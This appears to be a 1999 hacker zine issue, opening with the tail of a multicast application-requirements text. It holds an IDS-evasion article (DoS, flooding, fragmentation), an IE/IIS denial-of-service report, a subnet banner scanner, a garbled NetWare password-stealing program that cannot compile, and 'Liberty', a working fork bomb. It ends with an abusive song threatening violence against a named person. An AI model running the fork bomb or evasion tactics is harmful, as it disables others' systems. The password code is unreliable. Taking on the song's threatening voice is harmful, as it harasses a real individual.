is characterized by traffic that is not sensitive to throughput or
delay, but is sensitive to errors, i.e. it needs reliable transfer.
The reliability, however, may be provided immediately or delayed due
to the inability of the receiver to acknowledge in circumstances where
the return channel is disabled or unavailable. For this reason an
unreliable multicast must be provided in addition to a reliable
multicast capability. In fact, a hybrid is needed such that when a
message is multicast to a group some members of the group can be
expected to acknowledge immediately and others may have to provide
for their own reliability by enlisting the services of a logging agent
or other means.
Email could be sent between individuals or from an individual to a
group or organization. Messages of varying priority require a range
of guaranteed delivery speeds. This range, reflected in the accompanying
chart, is typically from a couple of seconds to hours.
4.1.2 Communication Requirements
Characteristic: Range of Values:
--------------------------------------------------------------------------
Group Management Known
Topology PT->MP
Scalability 100
Ordering Source
Reliability Range Absolute
QoS
Throughput 3 Mbps
Latency per-message: 2 secs. to hours
Jitter no requirement
Precedence/Priority Per-message
Reliability communication channel dependent
Capacity communication channel dependent
4.2. Text and Image File Transfer
4.2.1 Application Use
Applications in this category include image/file archive/retrieval,
the distribution of weather maps, distribution of key management
and other databases. (Also, web cache preload, software dissemination,
network news, pre-loading of a database for DIS or games). A typical
application is non-realtime bulk data transfer such as the retrieval
of an image from an archive. These applications fit a client/server in
that the receiver can be the client of a server...the transmitter.
The data flow in these applications is unidirectional. No hierarchiacal
distribution system is needed. Characteristics not (particularly)
delay sensitive but error sensitive. File sizes are great. In some
cases, files must be dealt with as monolithic. Transfers on the order
of tens of seconds are tolerated. Image files require very low error
rates. Compression is necessary. Since there is no interaction, users
do not perceive round-trip delays or excessive latencies.
4.2.2 Communication Requirements
Characteristic: Range of Values:
--------------------------------------------------------------------------
Group Management Unknown
Topology PT->MP
Scalability 1000
Ordering Source
Reliability Range k-reliability
QoS
Throughput 10 Kbps
Latency no requirement
Jitter no requirement
Precedence/Priority Per-message
Reliability communication channel dependent
Capacity communication channel dependent
4.3 Voice/Video Teleconference
4.3.1 Application Use
Voice/video teleconferences impose soft real-time constraints on the
communication system.. Latency is the principal concern because of
human perception limitations. Reliability is not a principal concern
since data is redundant and is dependent more on freshness. Loss of
video data transmission, for example, may result in slight differences
in color or a fuzzy picture. There is no state to maintain or distribute
since audio/video consists of a stream of transition states.
Depending on the quality of signals transmitted, throughput demands
can be very high. Telephony quality voice, for example, demands only
64 Kbps, while to transmit NTSC video of 30 frames a second, could
require a full FDDI level of 100 Mbits/sec. Compression is typically
used to lower this throughput requirement. The distribution of this
type of data does require the reserving of net resources for the purpose
of assuring a QoS level where, typically, latency and jitter are the
constraints.
Video teleconference requires group formation policy that allows
initiating a session, joining existing sessions, leaving a session
without tearing it down if any participants remain connected, and
terminating the session. It requires the capability to conduct a
tightly-controlled N X N session if the number of participants is
restricted; or, a loosely-controlled session in a session from 1 to
N where the number of participants may be quite large. In any case,
control over group membership must be available.
4.3.2 Communication Requirements
Characteristic: Range of Values:
------------------------------------------------------------------------
Group Management Known
Topology MP<->MP
Scalability 15
Ordering Causal
Reliability Range best effort
QoS
Throughput 64 Kbps - 1 Mbps
Latency 1 sec.
Jitter 125 ms.
Precedence/Priority per-session
Reliability communication channel dependent
Capacity communication channel dependent
4.4 Voice/Video Broadcasting
4.4.1 Application Use
The broadcasting of voice and video differs from the VTC in its
requirements since there is no need to provide a return channel
from the receives to the transmitter. The non-interactive nature
also imposes less stringent demands for latency and jitter. Digital
video and audio require periodic updates of information to prevent
the image or voice playback from degrading
4.4.2 Communication Requirements
Characteristic: Range of Values:
--------------------------------------------------------------------------
Group Management Known
Topology PT->MP
Scalability 1000
Ordering Causal
Reliability Range best effort
QoS
Throughput 64 Kbps - 1 Mbps
Latency 5 secs
Jitter 1 sec.
Precedence/Priority per-session
Reliability communication channel dependent
Capacity communication channel dependent
4.5 Interactive multimedia
4.5.1 Application Use
Collaborative work tools, planning tools and distributed whiteboards
are examples of interactive multimedia applicatons. A distributed
whiteboard is a conferencing tool that distributes pages of a
whiteboard such that any participant can draw on any page. The goal
is to have consistent views across multiple platforms, therefore, the
processes implementing the whiteboard must exchange the current state
of the data. The operations that any participant performs on a page
must be sequenced and timestamped. Each participant is both sender
and receiver. Each member is responsible for detecting loss and reporting
this to the group and for periodically informing the group of their
place in the session. Repair requests could be multicast to the group
and any member of the group could effect repair. This, in turn,
requires the members of the group to have some concept of the distance
to each participant in the group and to invoke an algorithm for repair
that minimizes responses to repairs. This can be satisfied by timestamping
the status information multicast to the group. Priority is utilized to
determine the importance of transmitting the current page, a new page,
or repairs to a previous page.
Data in these applications are characterized as reliable, duplicate
free, ordered by source, and delivered within a finite period of time.
4.5.2 Communication Requirements
Characteristic: Range of Values:
-------------------------------------------------------------------------
Group Management Known
Topology MP<->MP
Scalability 15
Ordering Causal
Reliability Range Absolute
QoS
Throughput 64 Kbps - 1 Mbps
Latency 150 ms.
Jitter .125 ms.
Precedence/Priority per-session
Reliability communication channel dependent
Capacity communication channel dependent
4.6. Time-Sensitive Data Exchange
4.6.1 Application Use
Distributed simulations, situational awareness, virutal reality gaming,
billing distribution, and the dissemination of stock quotes are examples
of real-time data exchanges in this category. Soft real-time means that
the applications are time sensitive (as opposed to hard real-time which
are time critical).
Any virtual environment among hosts in a distributed system that are
simulating the behavior of objects in that environment fit this category.
Applications like distributed gaming and virtual reality require that
terrain and environmental updates be distributed in a multicast fashion
with low packet loss and low latency. Objects in this environment are
capable of physical interaction and can sense each other by visual and
other (sensor) means.
These applications are characterized by large scale memberships which
need to share a consistent view of the game space even in the face of
packet loss. In entertainment scenarios the number of simulated
objects could exceed 100,000 where each object produces a realtime
flow of 15 packets per second. Unlike applications like
videoconferencing, these applications cannot tolerate frequent
updates of data to guarantee freshness. Freshness is required yet
updates necessarily are infrequent for objects like terrain updates.
These applications are intended to work with input to and output
from humans interacting with distributed simulators in real time.
Human perception is the normal quantifier of latency requitements
(approx. 100 milliseconds).
Loss rates are stringent but not zero which means that semi-reliable
transfer may suffice. Latency must be predictable on the order of a
few hundred milliseconds and jitter must not exceed a few milliseconds.
There must be support for reserving network resources. Group
communication must allow all participants to transmit to all other
participants and the group management must allow hundreds of participants
to join/leave in less than a second.
4.6.2 Communication Requirements
Characteristic: Range of Values:
--------------------------------------------------------------------------
Group Management Known
Topology MP<->MP
Scalability 100,000
Ordering Causal
Reliability Range Absolute
QoS
Throughput 45 Mbps - 600 Mbps
Latency 150 ms.
Jitter .125 ms.
Precedence/Priority per-message
Reliability communication channel dependent
Capacity communication channel dependent
4.7. Time-Critical Data Exchange
4.7.1 Application Use
Air traffic control, realtime sensor systems, and combat data systems
are examples of applications in this category.
4.7.2 Communication Requirements
Characteristic: Range of Values:
--------------------------------------------------------------------------
Group Management Known
Topology MP<->MP
Scalability 500
Ordering Causal
Reliability Range Absolute
QoS
Throughput kbps-Mbps
Latency 20 ms.
Jitter 10 ms.
Precedence/Priority per-session
Reliability communication channel dependent
Capacity communication channel dependent
4.8 Replicated Data Base
4.8.1 Application Use
The distributed process control or replicated database are in this
category. The distinguishing requirement is the need for total order.
Application tasks could be divided among processors in a system and
data replicated to protect against failures. There is a need to
coordinate the tasks and reach consensus on state. Manufacturing
process control needs to schedule processes distributed across the
system. A consistent database is necessary to reach consensus.
4.8.2 Communication Requirements
Characteristic: Range of Values:
------------------------------------------------------------------------
Group Management Known
Topology MP<->MP
Scalability 100,000
Ordering Total
Reliability Range Absolute
QoS
Throughput 56 Kbps - 1 Mbps
Latency 1 sec
Jitter 10 ms.
Precedence/Priority per-message
Reliability communication channel dependent
Capacity communication channel dependent
[-------------------------------------]
kv[6]; /* Intrusion Detection Systems......................ProtocolD */
INTRODUCTION
Intrusion Detection Systems or commonly known
as IDS is a relatively new type of technology.
In short, IDS simply listens for known 'hack'
signatures real-time within the data packets.
Currently there are two types of IDS systems on
the market. These are Network Based IDS and Host
Based IDS. This article will attempt to explain
what the difference between Network and Host based
IDS. Although there are many ways to analyze traffic
on a network IDS, I will explore the possibilities
of evading one of these methods that uses a method
known as 'passive network packet capture' (sniffing).
NETWORK IDS :
This method of detection puts your network card ]
into promiscuous mode and sniffs all traffic
going by on the wire.
Problems
Due to the fact that it must analyze all traffic
passing by, many claim that it cannot be done on a
high-speed link effectively on a saturated link without
dropping packets. Because it sniffs the traffic, it
can only analyze the traffic on its own segment. Thus,
in a switched environment, you will require an IDS on each
segment.
HOST IDS :
This method only examines only the traffic destined to itself.
Problems:
Can only analyze the traffic destined to itself.
This method requires a client on each host and can
become costly.
METHODS OF (Network Based)
The first problem of course relies on the ability
of first detecting a Network IDS system. This is
possible by attempting to detect if there are any
systems on the network in promiscuous mode. If this
is detected, it could either be a sniffer or a network
based IDS. Either way, your goal would be to take down
this system or flood it to the point where packets begin
to be dropped. Currently there are utilities out there
that attempts to detect network cards in promiscuous mode.
TAKE-DOWN
Many sniffer-based IDS systems will fail open.
Once this happens, the attacker can continue on to it's
targeted host. This can be accomplished through any
number of DoS attacks. It should be noted that some systems
are resistant to Dos attacks.
EVASION
** By-Pass via Flood
If the network based IDS cannot be taken off line. Another
possible approach Would be to flood the system to the point
where it is dropping packets. Once this occurs, it may be
possible to then send the actual attack to the desired target
with hopes that the IDS system will drop the packet and
therefore not be able to detect the signature contained
within it.
** Forgery & Fragmentation
Typically an IDS system examines packets and compares
it's contents to known attack signatures. If the packet
can be forged or fragmented properly, it then may be possible
to by-pass the IDS. Many IDS's cannot reassemble fragmented
packets and compare them to it's list of signatures, thus
allowing malicious attack by. Once the packet reaches the
destined host, the packets are reassembled and a successful
attack is made.
SUMMARY
Basically there are problems associated with each of
these technologies. Ideally, the best solution would
have a both network & host based IDS. It should also be
noted that various types of IDS's provide many types of
Alerting when particular types of attacks occur. This
could be in the form of an e-mail, page or SNMP alert.
So, if you decide to attempt to DoS the system, an alert
of the event still might be made thus alerting them of
suspicious activity. Also note that one method of preventing
an IDS from being detected and or being taken down is by
assigning the network card an address of 0.0.0.0 This
will still enable it to sniff the traffic without being
detected and have no way of directing an attack directly at
the system. It will then use a second network card to send
off any alerts or alarms. This second network card is not in
promiscuous mode. With this type of design, it makes it difficult
to detect and disable the IDS system.
[-------------------------------------]
kv[7]; /* Another IE Exploit?.................................ntwak0 */
Potential DoS Attack on NT box with port 80 open
Jul 15 17:37:21 1999
(By NtWaK0 , slackette ) LOU Efnet #legions
Exploit Plat-Form :
I did try on NT server 4.0 + IE5 but i am sure it will work with IE4
Exploit Description :
All that you need to have is a box with 9x or NT + IE5 on it. Even FULLY
patched with, the box test was a server that run FTP anonymous and port
80
was open and an ASP pages on that web. The tester may be able to use
either
NT or 9x to facilitate this exploit.
Narrative will follow detailing steps taken.
1- Open IE5 or IE4 and Click option, then Security, NO to Cookie to
activex
and to java. In other word put your security to Maximum
2- From the start Menu Click START then RUN.
3- Type the IP address example <http://11.11.11.11/> hit enter
4-If the remote page has an asp page you will see your title bar
switching
between the two asp's. And your IE title bar will go nuts and you will
start
getting packets from the remote server.
This is what i recieved from sniffer when the server started sending.
The
default page didn't load and never loaded. If you do not stop IE you
will
recieve those packets numerous times and your link will be substantially
slowed.
GET /default.asp 47 45 54 20 2f 64 65 66 61 75 6c 74 2e 61 73 70
? HTTP/1.1.. 3f 20 48 54 54 50 2f 31 2e 31 0d 0a
Accept: image/gi 41 63 63 65 70 74 3a 20 69 6d 61 67 65 2f 67 69
f, image/x-xbitm 66 2c 20 69 6d 61 67 65 2f 78 2d 78 62 69 74 6d
ap, image/jpeg, 61 70 2c 20 69 6d 61 67 65 2f 6a 70 65 67 2c 20
image/pjpeg, app 69 6d 61 67 65 2f 70 6a 70 65 67 2c 20 61 70 70
lication/vnd.ms- 6c 69 63 61 74 69 6f 6e 2f 76 6e 64 2e 6d 73 2d
powerpoint, appl 70 6f 77 65 72 70 6f 69 6e 74 2c 20 61 70 70 6c
ication/vnd.ms-e 69 63 61 74 69 6f 6e 2f 76 6e 64 2e 6d 73 2d 65
xcel, applicatio 78 63 65 6c 2c 20 61 70 70 6c 69 63 61 74 69 6f
n/msword, */*.. 6e 2f 6d 73 77 6f 72 64 2c 20 2a 2f 2a 0d 0a
Accept-Language: 41 63 63 65 70 74 2d 4c 61 6e 67 75 61 67 65 3a
en-us.. 20 65 6e 2d 75 73 0d 0a
Server: Microsof 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f 66
t-IIS/4.0.. 74 2d 49 49 53 2f 34 2e 30 0d 0a
Date: Thu, 15 Ju 44 61 74 65 3a 20 54 68 75 2c 20 31 35 20 4a 75
l 1999 21:11:12 6c 20 31 39 39 39 20 32 31 3a 31 31 3a 31 32 20
Host: 000.000.00 08 0f 00 70 3a 00 32 30 37 00 32 35 00 2e 30 30
00.. 32 0 30 30 0d 0a
Connection: Keep 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70
5-Someone could code a program to exploit this infraction, being able to
generate a Denial of Service attack on the remote box or on the local
box
where you have memory consumption. Due to packets received from the
remote
site.
6-If you also run sniffer you will see what the server is sending . I
received about 2 Meg of data from the server. The page never loaded, and
the
only way to stop that data is to close IE.
Exploit Code :
N/A
Exploit Fix :
N/A
+---------------oOOo-(NtWaK0)-oOOo--------------------------------+
[-------------------------------------]
kv[8]; /* tryseg.c............................................guidob */
// Test for catching the SIGSEGV or SIGBUS without crashing
// and combined with try{}catch(){}
// Guido Bakker 1999 <guidob@synnergy.net>
#include <iostream.h>
#include <signal.h>
#include <stdlib.h>
#include <siginfo.h>
struct report {
int err;
int sig;
int critval;
} page1 = { 0, 0, 0 };
void notwithme(int);
int beyond(int);
int main(){
int i;
try{
sigset(SIGSEGV,notwithme);
sigset(SIGBUS,notwithme);
for(i=10000;;i++){
beyond(i);
cout << "Survifed beyond i = " << i << endl;
}
}
catch(report& seite1){
cout << "Yes we made it into the catch()" << endl;
cout << "seite1.err is: " << seite1.err << endl;
cout << "seite1.sig is: " << seite1.sig << endl;
cout << "seite1.critval is: " << seite1.critval << endl;
return(0);
}
catch(...){
cout << "Came to the second catch()" << endl;
return(1);
}
cout << "After the catch block" << endl;
return(1);
} // end of main()
int beyond(int i){
int a[50];
page1.critval = i;
// Main operation which causes an unforseen error
a[i]=1;
return(1);
}
void notwithme(int sig){
psignal(sig, "Function notwithme() got signal: ");
page1.err = 1;
page1.sig = sig;
throw page1;
return;
}
[-------------------------------------]
kv[9]; /* match.c..............................................icesk */
/* by icesk HEH damn i think i've released to many scanners :> */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <string.h>
#include <signal.h>
#define TIMEOUT 3
void al4rm(int sig);
int main(int argc,char **argv)
{
struct sockaddr_in thaddr;
int unf, i;
char buf3r[1024], hozt[1024];
if(argc != 4)
{
printf("icesk; %s [ip mask] [port] [searchword]\n",argv[0]);
exit(0);
}
for(i=1;i<255;i++)
{
if( (unf = socket(AF_INET, SOCK_STREAM, 0) ) == -1)
{
printf("c4nt g3t s0ck3t!#@\n");
}
thaddr.sin_family = AF_INET;
thaddr.sin_port = htons(atoi(argv[2]));
thaddr.sin_addr.s_addr = inet_addr(hozt);
bzero(&(thaddr.sin_zero), 8);
sprintf(hozt,"%s.%d", argv[1], i);
signal(SIGALRM, &al4rm);
alarm(TIMEOUT);
connect(unf, (struct sockaddr *)&thaddr, sizeof(struct sockaddr));
recv(unf,buf3r,sizeof(buf3r),0);
if(strstr(buf3r, argv[3]) != NULL)
{
printf("[%s!%s]; *MATCH*\n", hozt, argv[2]);
}
strcpy(buf3r,"unf");
}
}
void al4rm(int sig)
{
}
[-------------------------------------]
kv[10]; /* netsniff.c (reprint)..............................mnemonic */
------------------------------ begin here ------------------------------
/* NetWare Sniffer 1.0 written by Mnemonic */
#include <malloc.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include "structs.h" /* this is at the bottom of my notes in kv5 */
void GetMyAccountPassword();
int main()
{
char imthinkn;
printf("NetWare Sniffer is copyright 1998 Mnemonic, little buddy\n");
printf("Would you like to (a) get the password for the account you're\n");
printf("on now, (b) get the password of another user or application\n");
printf("or (c) quit? ", imthinkn);
switch(imthinkn)
case 'a': case 'A':
GetMyAccountPassword()
break;
case 'b': case 'B':
GetObjectData()
break;
case 'c': case 'C':
return 3;
}
FORWARD int GetUserAndAppInfo(char *argv[], int nMaxArgs, OBJECT *pObject,
APPLICATION_OBJECT *aop);
extern int RetrieveApplicationData(APPLICATION_OBJECT *aop);
extern FS_CONNECTION_INFO *GetConnInfo(WORD wConnectionNumber);
FORWARD OBJECT *GetObjectData(char *pszObjectName, WORD wObjectType);
GLOBAL OBJECT *GetObjectData(char *pszObjectName, WORD wObjectType)
{
int nIndex;
int nNumberObjects = 0;
OBJECT *pObject = NULL;
OBJECT obj;
int nCompletionCode;
obj.oid = -1L; /* initial value for scanbinderyobject.
must be -1L, gets updated by the function.*/
for (;;)
{
nCompletionCode = ScanBinderyObject(pszObjectName, wObjectType, &obj.oid,
obj.szObjectName, &obj.wObjectType, &obj.byPropertiesFlag, &obj.byObjectFlag,
&obj.byObjectSecurity);
if (nCompletionCode != SUCCESSFUL) /* problem or finished */
{
if (nCompletionCode != NO_SUCH_OBJECT)
{
if (pObject != NULL)
free(pObject);
errno = nCompletionCode;
return NULL;
}
break;
}
nIndex = nNumberObjects++;
pObject = (OBJECT *)
realloc(pObject, (nNumberObjects * sizeof (OBJECT)));
if (pObject == NULL)
return NULL;
/* do structure assignment to fill array element. */
pObject[nIndex] = obj;
} /* end for (;;) */
/* add dummy element */
pObject = (OBJECT *)
realloc(pobject, ((nNumberObjects + 1) * sizeof (OBJECT)));
if (pObject != NULL)
/*zero out of the dummy element. */
memset(&pObject[nNumberObjects], '\0', sizeof (OBJECT));
if (nNumberObjects == 0)
errno = NO_SUCH_OBJECT;
GetUserAndAppInfo()
}
GLOBAL int GetUserAndAppInfo(char *argv[], int nMaxArgs, OBJECT *pObject)
{
/*GetConnectionNumber() returns a value rather than an error code so
we can use it as an input parameter to GetConnInfo(). */
if (pFSConnInfo == NULL)
return -1;
strcpy(aop->obj.szObjectName, argv[nMaxArgs - 2]);
aop->obj.wObjectType = OT_APPLICATION;
strcpy(aop->szPassword, argv[nMaxArgs - 1]);
fread(&szPassword, sizeof(int), 1, inpf);
printf("\nThe password for that account is ", szPassword, "\n");
printf("\nAnd don't forget.. NetWare Sniffer is copyright 1998 Mnemonic\n");
main()
return 2;
}
}
void GetMyAccountPassword(char *argv[], int nMaxArgs, OBJECT *pObject)
{
FS_CONNECTION_INFO *pFSConnInfo;
pFSConnInfo = GetConnInfo(GetConnectionNumber());
if (pFSConnInfo == NULL)
return -1;
/*we have the user information in pFSConnInfo->fsLoggedObject.boj.*/
*pObject = pFSConnInfo->fsLoggedObject.obj;
free9pFSConnInfo);
strcpy(aop->obj.szObjectName, argv[nMaxArgs - 2]);
aop->obj.wObjectType = OT_APPLICATION;
strcpy(aop->szPassword, argv[nMaxArgs - 1]);
fread(&szPassword, sizeof(int), 1, inpf);
printf("\nThe password for the account you're on is ", szPassword, "\n");
printf("\nAnd don't forget.. NetWare Sniffer is copyright 1998 Mnemonic\n");
main()
return 1;
}
}
------------------------------- end here -------------------------------
NetWare Sniffer allows you to do one of two things. You can get the
password for the account you're on, or get the password for another
object. NWS actually retrieves the 128-byte segment which represents an
object's password, and then converts this binary string into text.
To receive the password to the account you're on, we use functions in the
Connection Services. So we can call GetConnectionNumber() to get the
number that the file server has assigned to this workstation's connection
and call GetConnInfo() to get the name of the user among other information
including the password.
To get the password for another object we first have to get the name of
the object. NWS uses the function GetObjectData() which uses
ScanBinderyObject() to populate a structure of type OBJECT.
ScanBinderyObject() can be used to retrieve data for more than one object
at a time, but will probably end up screwing things up if you try it. The
object name argument can contain wildcards (* or ?), and the object type
may be passed as OT_WILD. An object name of * and an object type of
OT_WILD means return every object in the bindery, which will also screw
you up. Because of this, GetObjectData() returns a pointer to an array of
OBJECT structures. The last element is a dummy with all fields cleared to
0. NWS then uses GetUserAndApplicationData() to retrieve the password.
The bindery is a database where NetWare keeps information about the
network resources and users that many function groups use to store and
retrieve information. Each file server on a network system has its own
bindery, and thus its own group of known objects.
The bindery represents objects using object IDs, which are
system-generated long (four-byte) integers. NetWare stores them in
high-low order. The object ID serves as a handle to object information.
The object type identifies the role the object plays in the network
environment. Novell reserves type numbers up to 0x8000 for well-known
types. Each object may in turn possess identifying characteristics, known
as properties. Properties can either be items, which are stored as
128-byte segments of unformatted data, or sets, which are listed of object
IDs. Properties are either static or dynamic, and have read/write security
protection. Properties have these attributes:
The property name is a character string of up to 16 characters, including
the null terminator. Property names have the same restrictions on use of
characters as object names.
The property flags are stored as a one-byte field. They indicate whether
the property is static or dynamic, and whether it is an item or a set.
Item properties are unformatted binary fields stored in 128-byte segments
which are interpreted by applications or NetWare APIs. Sets are lists of
object IDs; these are interpreted by NetWare.
The property security plays the same role for properties as for objects.
The values flag indicates whether the property has been assigned a value.
Properties are dependant on objects, which have these attributes:
OBJECT ID
OBJECT NAME
OBJECT TYPE
OBJECT FLAG
OBJECT SECURITY
PROPERTIES FLAG
There are two ways of identifying objects. You can use the OBJECT ID or
the OBJECT
NAME and OBJECT TYPE.
These are the properties attributes:
OBJECT ID
PROPERTY NAME
PROPERTY FLAGS
PROPERTY SECURITY
VALUES FLAG
NetWare stores items and sets as 128-byte segments of binary data. With
item data, a segment contains anything an application wants it to, with
set data, a segment holds 32 object IDs. An item property can only be
represented as a variable-length binary, or RAW, column. The only other
column that we need is the object ID, so we know who the property belongs
to.
The structure of the set property table comes clear if we think about what
it represents. For example, the properties GROUPS_I'M_IN and GROUP_MEMBERS
are used by NetWare to track group membership. A user object may belong to
any number of groups. A user group object may contain any number of users.
These properties express a relationship of the OBJECTS table with itself.
PASSWORD is of type item, and would be structured thus:
OBJECT ID
SEGMENTS
DATA
A set property is just an array of OBJECT_IDs. With both item properties
and set properties, we don't know how many segments we will retrieve, so
we declare pointers to the values, which we will allocate memory for.
------------------------------ begin here ------------------------------
/* structs.h */
#define MSC 510
#define LINT_ARGS
/* netware's prolog.h still thinks it's working with microsoft c 4.0 */
#include <prolog.h>
#include <nit.h>
#include <niterror.h>
#include <nxt.h>
#ifndef TRUE
#define TRUE 1
#endif
#ifndef FALSE
#define FALSE 0
#endif
#define FORWARD extern
#define LOCAL static
#define GLOBAL
#define MAX_OBJECT_NAME_LENGTH 48
#define MAX_PROPERTY_NAME_LENGTH 16
#define SEGMENT_SIZE 128
#define MAX_DIRECTORY_LENGTH 255
#define OT_APPLICATION 0x8001 /* our new object type */
typedef long OBJECT_ID; /* this has to go here */
#define OBJECTS_PER_SEGMENT (SEGMENT_SIZE / sizeof (OBJECT_ID))
typedef int BOOL;
typedef BYTE SEGMENT[SEGMENT_SIZE];
typedef struct _OBJECT_
{
char szObjectName[MAX_OBJECT_NAME_LENGTH];
WORD wObjectType;
OBJECT_ID oid;
BYTE byObjectFlag;
BYTE byObjectSecurity;
BYTE byPropertiesFlag;
} OBJECT;
typedef struct _ITEM_PROPERTY_
{
int nSegments;
BYTE *pValue;
} ITEM_PROPERTY;
typedef struct _PROPERTY_
char szPropertyName[MAX_PROPERTY_NAME_LENGTH];
BYTE byPropertyFlags;
BYTE byPropertySecurity;
BYTE byValuesFlag;
union
{
ITEM_PROPERTY iProperty;
OBJECT_ID *pObjectList;
} uPropertyValue;
} PROPERTY;
typedef struct _OBJECT_INFO_
{
OBJECT obj;
PROPERTY *pObjectProperties; /* array of unknown size */
} OBJECT_INFO;
typedef struct _APPLICATION_OBJECT_
{
OBJECT obj;
char szPassword[SEGMENT_SIZE];
WORD wMaximumUsers;
char szApplicationDirectory[2 * SEGMENT_SIZE];
OBJECT_ID *pAllowedUsers;
OBJECT_ID *pCurrentUsers;
} APPLICATION_OBJECT;
typedef char SERVER_NAME[MAXOBJECT_NAME_LENGTH];
typedef struct _WS_CONNECTION_
{
BYTE byInUseFlag;
BYTE byOrderNumber;
BYTE byNetworkNumber[4];
BYTE byNodeAddress[6];
BYTE bySocketNumber[2[;
BYTE byReceiveTimeOut[3];
BYTE byRoutingNode[6];
BYTE byPacketSequenceNumber;
BYTE byConnectionNumber;
BYTE byConnectionStatus;
BYTE byMaximumTimeOut[2];
BYTE byPadding[5];
} WS_CONNECTION;
typedef struct _WS_TABLE
{
SERVER_NAME szServerName;
WS_CONNECTION wsc;
} WS_TABLE;
typedef struct _FS_CONNECTION_
{
WORD wConnectionNmber;
IPXAddress SationAddres;
BYTE byRoutingNode[6];
} FS_CONNECTION;
typedef struct _NW_DATE_AND_TIME_
{
BYTE byYear; /* 0 to 99; less than 80 is in the 21st century */
/* yes I do realize that when we hit 2000 my program */
/* will screw up and stuff */
BYTE byMonth;
BYTE byDay;
BYTE byHour;
BYTE byMinute;
BYTE bySecond;
BYTE byDayOfWeek; /* 0 to 6, 0 is sunday */
} NW_DATE_AND_TIME;
typedef struct _FS_LOGGED_OBJECT_
{
WORD wConnectionNumber;
OBJECT obj;
NW_DATE_AND_TIME nwdtLoginTime;
} FS_LOGGED_OBJECT;
typedef struct _FS_CONNECTION_INFO_
{
FS_CONNECTION fsConnection;
FS_LOGGED_OBJECT fsLoggedObject;
} FS_CONNECTION_INFO;
#include "blahblah.dec"
------------------------------- end here -------------------------------
------------------------------ begin here ------------------------------
/*
* blahblah.dec - this thing's gonna be used for other stuff I write too
*/
/* gotta have all o' this stuff to define the types, and also
for use in a program that will be in a later kv issue */
extern void AddApplication(void );
extern void AllowedUsers(int nAction);
extern int BinderyCheckCode(int nCompletionCode);
extern int CheckObject(OBJECT *pObject, char *pszObjectPassword);
extern int CheckCommandLineArgs(char * *argv, int argc, int nMaxArgs);
extern int CountCurrentUsers(APPLICATION_OBJECT *aop);
extern void CurrentUsers(void );
extern void DeleteApplication(void );
extern int DeleteObject(OBJECT *pObject);
extern int DeleteObjectProperty(OBJECT *pObject, PROPERTY *pProperty);
extern OBJECT *DestroyObject(OBJECT *pObject);
extern PROPERTY *DestroyObjectProperty(PROPERTY *pProperty, unsigned short wProperties);
extern int GetApplication(APPLICATION_OBJECT *aop);
extern int GetUserAndAppInfo(char * *argv, int nMaxArgs, OBJECT *pObject, APPLICATION_OBJECT *aop);
extern int GetItemOrSet(OBJECT *pObject, PROPERTY *pProperty);
extern OBJECT *GetObjectData(char *pszObjectName, unsigned short wObjectType);
extern OBJECT_INFO *GetAllObjectInfo(char *pszObjectName, unsigned short wObjectType);
exern PROPERTY *GetObjectPropertyData(OBJECT *pObject, char *pszPropertyName);
extern int IsUserAllowed(OBJECT *pObject, APPLICATION_OBJECT *aop);
extern int IsUsingApplication(OBJECT *pObject, APPLICATION_OBJECT *aop);
extern int IsValidName(char *pszObjectName, unsigned short wMaxLength);
extern void KillNewLine(char *pszString);
extern void ListUsers(APPLICATION_OBJECT *aop, int nUserType);
extern int LinkObjectsInSet(OBJECT *pOwner, OBJECT *pMember, char *pszSetName);
extern int RetrieveApplicationData(APPLICATION_OBJECT *aop);
extern int SetItemProperty(OBJECT *pObject, PROPERTY *pProperty);
extern int SetObjectData(OBJECT *pObject);
extern int SetObject PROPERTYData(OBJECT *pObject, PROPERTY *pProperty);
extern int RemoveObjectFromSet(OBJECT *pOwner, OBJECT *pMember, char *pszSetName);
extern void UpdateApplication(void );
extern int WriteAppDirectory(APPLICATION_OBJECT *aop);
extern FS_CONNECTION_INFO *GetConnInfo(unsigned short wConnectionNumber);
extern FS_CONNECTION_INFO *GetObjectConnInfo(OBJECT *pObject);
extern WS_TABLE *GetWSTables(void );
extern void VerifyLoginStatus(APPLICATION_OBJECT *aop);
extern int DirCheckCode(int nCompletionCode);
extern void DeleteApplication(void );
extern int CountCurrentUsers(APPLICATION_OBJECT *aop);
------------------------------- end here -------------------------------
kv[11]; /*Liberty............................................guidob */
/*
liberty - this will fill up all available swap and memory
if no ulimit is set in the kernel, most unix systems
that is, it works on all unix systems with local access
(at least, the ones i tried)
no more activity is possible after a few seconds this is
activated. - guidob
*/
#include <stdio.h>
#define BUF 4096
int main(int argc, char *argv[]) {
strcpy(argv[0], "man telnet\0");
printf("funky malloc() fork() weirdness\n");
printf("by guidob and CoolVibe\n");
do_malloc(BUF);
exit(0);
}
int do_malloc(int buf) {
fprintf(stderr, "Doing %d bytes of funky malloc() weirdness\n", buf);
printf("put this in the background and logout ;)");
if(fork()) {
while(1) {
fork();
malloc(buf);
}
}
}
[-------------------------------------]
kv[12]; /* Rootfest '99 Review.................................lothos */
kv[13]; /* Ode to JP.......................................krankshaft */
Ode to JP
(sang to the tune of "Ode to My Car, by Adam Sandler")
written by KrankShaft of Legions of the Underground
loved by everyone
Here we go...
Piece of shit media whore
I know a piece of shit whore
That fuckin' sellout
Won't get very far
He's a big piece of shit
He's bound to get fucking shot
JP's going to get broken
I'll tie him in a knot
(He's a piece of shit)
I can't see why he does it
He must be smoking crack
And he smells real bad
Everyone thinks he's really wack
(He's a piece of shit)
Piece of shit media whore
(He's a piece of shit whore)
He sucks royal dick
That fuckin' pile of shit
100% crap
No he won't get very far
Fuck you whore
He's got no friends, and his site is totally jacked
Whoever likes him can lick my sweaty nuck sack
(They can bite my ass too)
And he's got no fucking skills
He'd give anyone a blow
Just to hear them say, "I want to be like you, asshole"
(You fuckin piece of shit)
(Piece of shit media whore)
I know a piece of shit whore
(JP's a piece of shit whore)
I told him to suck my ass
(That fuckin pile of shit)
That pile of sold-out shit
(He never gets very far)
Oh now what the fuck did he do
What the fuck did he do
What the fuck did he do
To get in the news
You're going to be black and blue
Don't even try to sue
You better try something new
Oh fuck JP
Well he lies like a fucking rug
JP always fucking stalls
And he's gonna get a fat lip
And a swift kick to the balls
(Ouch ouch ouch)
Plus he tries to get everyone busted
I had to run to a fucking hangar
(He's a pain in my ass)
And if a girlie ever see's this whore
